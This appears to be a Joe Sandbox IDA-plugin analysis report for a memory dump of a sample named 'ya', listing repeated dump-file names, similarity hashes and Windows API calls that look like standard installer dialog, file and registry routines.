                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
                                                                                                                                                                            • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                            • Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                                              • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                            • String ID: 9
                                                                                                                                                                            • API String ID: 163830602-2366072709
                                                                                                                                                                            • Opcode ID: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction ID: b311e590087b617af27c489dd20f6d509b220c8bdff7a9a3342c218b0a6eff93
                                                                                                                                                                            • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                            • lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                            • lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                            • SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2531174081-0
                                                                                                                                                                            • Opcode ID: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction ID: 03453bb2bff48f2ebe7eef3f6a9ba8bdb22b1403b4f5d045e67352473deb1f71
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ee65e7083464dabd9b9679093671ff8473f9e09a681baeda15732d5d792e9f2
                                                                                                                                                                            • Instruction Fuzzy Hash: E221AE71800218FACF019F65DD8498FBFB8EF45354F10803AF944B22A0C77A8A909F68
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                                                            • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                                              • Part of subcall function 00403037: MulDiv.KERNEL32(00000000,00000064,000377E3), ref: 0040304C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                            • Opcode ID: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                                                            • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                                                            • Opcode Fuzzy Hash: 166ce091c32d309e4fa310a444bcd8b9ff139d0f29b7c4b4c095a56911891c85
                                                                                                                                                                            • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
                                                                                                                                                                            • GetMessagePos.USER32 ref: 00404FFF
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00405019
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                            • String ID: f
                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                            • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                                                            • wsprintfW.USER32 ref: 0040300A
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                            • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                                                            • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                                                            • Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
                                                                                                                                                                            • Opcode Fuzzy Hash: fb46b4e8df1db46309afd02b3fdc802fdc32471e2582139a23931f61c0d3c173
                                                                                                                                                                            • Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                                            • wsprintfW.USER32 ref: 00404F78
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s$H'D
                                                                                                                                                                            • API String ID: 3540041739-2781796796
                                                                                                                                                                            • Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                                                            • Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
                                                                                                                                                                            • Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                                                            • Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                                            • CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                                            • CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                            • Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                            • Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1354259210-0
                                                                                                                                                                            • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                                                            • Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
                                                                                                                                                                            • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                                                                                                                            • Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                                                            • Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                                                            • Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(?), ref: 00401E76
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                                                            • CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
